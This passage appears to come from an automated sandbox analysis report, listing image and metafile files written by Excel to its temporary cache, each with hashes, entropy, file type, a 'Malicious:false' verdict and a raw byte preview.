                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29AF82FC.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                          Category:dropped
                                                          Size (bytes):29499
                                                          Entropy (8bit):7.667442162526095
                                                          Encrypted:false
                                                          SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                          MD5:4FBDDF16124B6C9368537DF70A238C14
                                                          SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                          SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                          SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\365FCBB7.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                          Category:dropped
                                                          Size (bytes):8815
                                                          Entropy (8bit):7.944898651451431
                                                          Encrypted:false
                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                          Malicious:false
                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4132FFE5.emf
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                          Category:dropped
                                                          Size (bytes):1316
                                                          Entropy (8bit):3.0840340624796188
                                                          Encrypted:false
                                                          SSDEEP:24:YWLj/Bu99sA0D4U799D1sIyVk3/wKivaHRS2:hLbVeITmak2
                                                          MD5:BE9229401B6EC704E0AFF008FF066918
                                                          SHA1:5408CAA831484E21A7B4A56317D5DF8566D0222D
                                                          SHA-256:2CE1B2D517721F60C9086DEEBB9093BDA2BDA8B66F34D20DC3270C91D439711A
                                                          SHA-512:09C0C8779AEB6C9121D4A4CEF8330051A178FB656DB162238CE9776B908087A00F08B2781491C45E0C3256AB0EE32594D93A37361EFA3F0E6F481148600B9EEB
                                                          Malicious:false
                                                          Preview: ....l................................... EMF....$.......................V...........................fZ..U"..F...4...&...GDIC........o4.f..............................................................................-.........!..................................................................................@..Calibri..#.7..K.h."..Iww@.zw2.f.....-.................2.................Label1................'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw..........................K....../L.,."...K...=......;........G...........=../=......3L...=...L...K.......=.........4.".......=..3L.4."..]]w.]]w... .....L=...=. .K.............
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5394A5DD.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 199 x 126, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):4740
                                                          Entropy (8bit):7.917839815538774
                                                          Encrypted:false
                                                          SSDEEP:96:oAnIkq3L3l05ZEpmgsv0Q3UtPwkCYHMYPhcky7JcO7dY/:oAnz15qhsrUtPwYHtPhOZ7dY/
                                                          MD5:493B0785A76407BFBD3983964D9EA288
                                                          SHA1:D4F7298439073EA125F7EE9C415091EF8C71FE01
                                                          SHA-256:CDAD5DACB34C7C421ADE9645520051A1620E32DBB41990CF05C3D6BABC9BC1ED
                                                          SHA-512:A343C143BFCC69B5AEEF78DEE567F80769541861310D7A3F4985AADE428F3D47B29228857A1A0FFC7F54E4E88699014253DCD06554ABE586953750685F37A550
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.......~........,....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^..r...5W.._..~...|.......P...#...M ).-R6ER.%j4.......}..n.......46z...H....I.d.*..2OU..u...F...../.....H......../4...Q"..)`.....T-..v)...*.j...J.b.....L..x....T......F....m....PB...x<..N...%."q[j..\./--.*..|...Q..2..;...{p..q..p.w.....n.......?...%|2..\......R..`*..t1....46%..Z."...f..U.X..*..MaO......)...O.:.Vo.z..&.D<....o...'....}...i...|...b1.T.t:...G.~.`.*.0q..F..6..W.D.R..+...O.V......7...}..?P....P4..........^........6W*...J..R.l...H...d..= V.M...)..U.V....".h0..ds..F".x<......hy...m.v{...O....Zhw.()W*.X......U.....Z.2[K.R.p4....;L$S..| ..GS.f...|......|?.M.2.z.=[oa).k.F;_.E..l7Z..Ko(.....t..H*_.T.m..0.).;=T.7;X..s....|.Nx z.....$.....Yn..Ff.n...Q..x..l'......s...L......X".|6_..#8=<....[..H.^X.'..I.n .B.b.*.o.Z.3(........S..2.Xc....T.5.jk 2.....[B..8-3..*+_n..,S2...G.T.tG..G.O...0......p$..:.. .F.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A7818AB.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                          Category:dropped
                                                          Size (bytes):14198
                                                          Entropy (8bit):7.916688725116637
                                                          Encrypted:false
                                                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                          Malicious:false
                                                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DF1CC3E.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 199 x 126, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):4740
                                                          Entropy (8bit):7.917839815538774
                                                          Encrypted:false
                                                          SSDEEP:96:oAnIkq3L3l05ZEpmgsv0Q3UtPwkCYHMYPhcky7JcO7dY/:oAnz15qhsrUtPwYHtPhOZ7dY/
                                                          MD5:493B0785A76407BFBD3983964D9EA288
                                                          SHA1:D4F7298439073EA125F7EE9C415091EF8C71FE01
                                                          SHA-256:CDAD5DACB34C7C421ADE9645520051A1620E32DBB41990CF05C3D6BABC9BC1ED
                                                          SHA-512:A343C143BFCC69B5AEEF78DEE567F80769541861310D7A3F4985AADE428F3D47B29228857A1A0FFC7F54E4E88699014253DCD06554ABE586953750685F37A550
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.......~........,....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^..r...5W.._..~...|.......P...#...M ).-R6ER.%j4.......}..n.......46z...H....I.d.*..2OU..u...F...../.....H......../4...Q"..)`.....T-..v)...*.j...J.b.....L..x....T......F....m....PB...x<..N...%."q[j..\./--.*..|...Q..2..;...{p..q..p.w.....n.......?...%|2..\......R..`*..t1....46%..Z."...f..U.X..*..MaO......)...O.:.Vo.z..&.D<....o...'....}...i...|...b1.T.t:...G.~.`.*.0q..F..6..W.D.R..+...O.V......7...}..?P....P4..........^........6W*...J..R.l...H...d..= V.M...)..U.V....".h0..ds..F".x<......hy...m.v{...O....Zhw.()W*.X......U.....Z.2[K.R.p4....;L$S..| ..GS.f...|......|?.M.2.z.=[oa).k.F;_.E..l7Z..Ko(.....t..H*_.T.m..0.).;=T.7;X..s....|.Nx z.....$.....Yn..Ff.n...Q..x..l'......s...L......X".|6_..#8=<....[..H.^X.'..I.n .B.b.*.o.Z.3(........S..2.Xc....T.5.jk 2.....[B..8-3..*+_n..,S2...G.T.tG..G.O...0......p$..:.. .F.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69EC2A79.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):79394
                                                          Entropy (8bit):7.864111100215953
                                                          Encrypted:false
                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                          Malicious:false
                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98FE530E.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                          Category:dropped
                                                          Size (bytes):14198
                                                          Entropy (8bit):7.916688725116637
                                                          Encrypted:false
                                                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                          Malicious:false
                                                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EE93CA2.emf
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                          Category:dropped
                                                          Size (bytes):1824
                                                          Entropy (8bit):3.1396658634113037
                                                          Encrypted:false
                                                          SSDEEP:24:YF09+01Uo7v3dLcFTUDb2Iyzj5s9SKiDHaXRmf/RQfwRSER8vdR+R/Ro8w:4oj3dLcFTvIw5sZiaQm
                                                          MD5:8DB7C9EB4234BEF9BBB39F602BCEB824
                                                          SHA1:E98F58B395663F25D6220D7C033B6D15C53CECEC
                                                          SHA-256:04213745DB3ED00DB4562DC0D889428588FC147E536078741C98AC5578ECE6D4
                                                          SHA-512:5FC135D32B3E75872E8254B5ED8C5648B052AB5C1466AEAE7BA3C653BEB236FDC48F68A3D3378138C8009F59E561D09A7A22E708DBD5F9846061FBAD67F082FE
                                                          Malicious:false
                                                          Preview: ....l...............1...............xM.. EMF.... ...!...................V...........................fZ..U"..F...........GDIC.........rH...................................................2...........................-.........!...2.......................2......................................................@..Calibri..#.7..K.h."..Iww@.zw."f.....-.................2.................L.......2...............$.a.......2.$.........$...6.b.......2.6.........6...H.e.......2.H.........H...Z.l.......2.Z.........Z...l.2.......'...................................2...............2...............................2...!.......'.......................%...........L...d...............1...............2...!..............?...........?............................................................2.......................................R...p................................@..C.a.l.i.b.r.i.................................................................zw..........................K.............4."..e]w.."...YwO8.W
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A722F1.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 110 x 167, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):12102
                                                          Entropy (8bit):7.961820953240898
                                                          Encrypted:false
                                                          SSDEEP:192:mCDzUPwtX3W0bXeFgeK+HsT/MtGLWIoo5LKApRCRhZW3Fg8wW5eRidb/iAl6NXbs:mC3U45FXcgetMTi633h3FVz5eRObiAcu
                                                          MD5:1C539D78D01284594C999E790447F6FB
                                                          SHA1:582531AE27BDD6E091043EF4F38ECBEF0A6FB2F1
                                                          SHA-256:62583DB38588AC74F6EC4D8FDCC94780C0206F21BE3A5CF90AC2E212EBC3FAF5
                                                          SHA-512:132F227B9762B2AAD02327DDBC61B1F6786BBA03FFC233FFF223D41E3E09534DC4E98EFC5C064F26169D4C1C998999B2E888D685CEEC0A5B6013E39F1FEB52F7
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...n..........i.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^....uE..p....LTl).00....T@....D.....,.N@P,l..P..........7.f....s.w....}...k.Y.?k......._..{....z(....x..^.W......z.e`...Y....U..q..i....b....6n`.*..*..0..5....?/.~......7...?.~...w..}.{..dy.^U.;../}.....(..K...U~...W....}n9s._.p.;.{>.x.3..o......v.d.{...?...z}.)...|.#..=...s.1........C.=...:...}..._.*..x`..-oY..........y.C._..Z......v.c\....k..I..}..^^...1.r.!k..y.{^y.k^S......r..W...>..._.....?....|.;../~q../.Y^............O,w............{g.A.{...y.{._..nu.[..~...Zgns...N....nw...\.*e...}.C.&.lR.t&....>........[....Y.zV..'?.....o...d..E.R...Vf....(........?.........~.2.0=..O.m=.../w....3.....<...&..>.)OyJe.........xm...B@`......f7.YA.L.......>..Oy..._..A...>...A.zP9.....;.P..w.....\.B...m........p..u.......2.s..\y...Pg...,....o^>..O.:.....{6.5._...(7.....~......^..r.k_.<.../_..W.c..r..
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB377A3A.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):84203
                                                          Entropy (8bit):7.979766688932294
                                                          Encrypted:false
                                                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9A26101.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):51166
                                                          Entropy (8bit):7.767050944061069
                                                          Encrypted:false
                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC2E50F3.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                          Category:dropped
                                                          Size (bytes):29499
                                                          Entropy (8bit):7.667442162526095
                                                          Encrypted:false
                                                          SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                          MD5:4FBDDF16124B6C9368537DF70A238C14
                                                          SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                          SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                          SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2E7424C.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 110 x 167, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):12102
                                                          Entropy (8bit):7.961820953240898
                                                          Encrypted:false
                                                          SSDEEP:192:mCDzUPwtX3W0bXeFgeK+HsT/MtGLWIoo5LKApRCRhZW3Fg8wW5eRidb/iAl6NXbs:mC3U45FXcgetMTi633h3FVz5eRObiAcu
                                                          MD5:1C539D78D01284594C999E790447F6FB
                                                          SHA1:582531AE27BDD6E091043EF4F38ECBEF0A6FB2F1
                                                          SHA-256:62583DB38588AC74F6EC4D8FDCC94780C0206F21BE3A5CF90AC2E212EBC3FAF5
                                                          SHA-512:132F227B9762B2AAD02327DDBC61B1F6786BBA03FFC233FFF223D41E3E09534DC4E98EFC5C064F26169D4C1C998999B2E888D685CEEC0A5B6013E39F1FEB52F7
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...n..........i.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^....uE..p....LTl).00....T@....D.....,.N@P,l..P..........7.f....s.w....}...k.Y.?k......._..{....z(....x..^.W......z.e`...Y....U..q..i....b....6n`.*..*..0..5....?/.~......7...?.~...w..}.{..dy.^U.;../}.....(..K...U~...W....}n9s._.p.;.{>.x.3..o......v.d.{...?...z}.)...|.#..=...s.1........C.=...:...}..._.*..x`..-oY..........y.C._..Z......v.c\....k..I..}..^^...1.r.!k..y.{^y.k^S......r..W...>..._.....?....|.;../~q../.Y^............O,w............{g.A.{...y.{._..nu.[..~...Zgns...N....nw...\.*e...}.C.&.lR.t&....>........[....Y.zV..'?.....o...d..E.R...Vf....(........?.........~.2.0=..O.m=.../w....3.....<...&..>.)OyJe.........xm...B@`......f7.YA.L.......>..Oy..._..A...>...A.zP9.....;.P..w.....\.B...m........p..u.......2.s..\y...Pg...,....o^>..O.:.....{6.5._...(7.....~......^..r.k_.<.../_..W.c..r..
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emf
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                          Category:dropped
                                                          Size (bytes):3199944
